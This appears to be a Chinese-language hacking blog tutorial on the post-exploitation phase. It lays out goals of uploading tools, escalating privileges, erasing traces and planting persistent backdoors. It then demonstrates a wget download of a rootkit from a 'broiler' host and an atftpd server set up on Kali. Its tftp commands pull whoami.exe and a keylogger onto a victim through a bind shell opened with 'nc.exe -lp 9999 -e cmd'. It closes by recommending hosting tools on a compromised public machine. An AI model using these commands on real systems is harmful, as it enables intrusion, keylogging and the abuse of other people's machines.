後滲透階段開始
前幾天收到一位兄弟的讚賞,在此表示感謝!
經過之前的步驟,我們應該已經可以發現主機的漏洞,並且獲取到一定的許可權
下面就進入了後滲透測試階段
在後滲透測試階段我們主要的目標就是上傳工具,許可權提升,擦除攻擊痕迹,安裝持久化後門
以上的每一個步驟都至關重要!
上傳工具
可能此時我們通過一個REC漏洞獲取了一個shell,不過僅僅一個shell的功能是有限的,為了擴大戰果,我們需要上傳更為有力的工具,比如mimikatz,wce,為以後的攻擊做準備
這裡我們針對的系統主要是Windows和Linux
在Linux上我們可以使用nc, curl, wget,這些在很多Linux發行版本中都是默認安裝的,用來遠程從我們的肉雞上下載一個tool簡直不能再方便了
wgethttp://123.123.34.3/rookit.exe
最簡單的使用方法
所以我們接下來講述的主要針對Windows
在Kali的/usr/share/windows-binaries/文件夾下有一些Windows上常用的一些工具,比如鍵盤記錄,whoami等
1.TFTP
TFTP是基於UDP協議的一個協議,與FTP協議類似,都可以提供文件傳輸
我們沒有首先採用FTP協議來進行遠程下載工具就是因為FTP需要交互輸入密碼,有時候我們獲取到的shell並非交互的,所以很難實現
TFTP是不需要身份驗證的,也就是說伺服器上有文件直接下載就行
TFTP在XP和Win2003系統中是自動安裝的,win2003還是有很大一部分伺服器在使用的,所以我就以2003來進行演示
這個是安裝win2003的截圖,很熟悉的界面,上一次安裝好想還是我在弄第一期培訓
客戶端安裝完成後我們開始配置我們的TFTP伺服器端,我們用Kali就可以完成這個伺服器的假設
在假設伺服器之前我們應該明確一點,我們的伺服器不能被反黑掉,所以在許可權控制和訪問控制方面需要做一下限定
1.新建一個目錄
mkdir ~/tftp
2.修改許可權為nobody,這是一個未登錄的許可權,許可權只能用來下載
chown –R nobody ~/tftp
3.將我們需要傳遞的工具複製到目錄中
cp /usr/share/windows-binaries/whoami.exe ~/tftp
4.開啟服務
atftpd --daemon --port 69 ~/tftp
--deamon以後台形式啟動
--port埠是69
5.檢測服務是否成功開啟
netstat –pantu | grep 69
####這裡有一個問題,我必須強調一下
此處指定的路徑必須是絕對路徑,我在上面執行指定的是一個相對路徑,這樣會導致後續下載不到文件
所以上面應該變為
atftpd --daemon --port 69 /root/Desktop/tftp/
我們就用nc來在window2003上模擬一個非交互性的shell
nc.exe –lp 9999 –e cmd
遺憾的是我發現,在win2003r2版本中並沒有默認安裝tftp
當我想要看看win2003版本時候發現沒有可用的密鑰,所以我就用一台XP來進行演示
nc.exe –lp 9999 –e cmd
這邊我們用Kali的nc去連接一下,模擬出一個遠程shell
我們在shell中執行
tftp -i 192.168.123.53 get whoami.exe
-i二進位格式
tftp -i 192.168.123.53 get klogger.exe
可以看到已經下載成功了,之後我們執行一下看看效果吧
以上只是一個簡單的小例子,通常來說我們應該把我們的程序放在公網上的一台肉雞中,在攻擊之前在肉雞上開啟服務,下載之後關閉。
更多方法敬請期待!
-END-
義大利的貓
有態度
不苟同
你們的打賞和支持是我寫下去的動力哦
TAG:漫流沙 |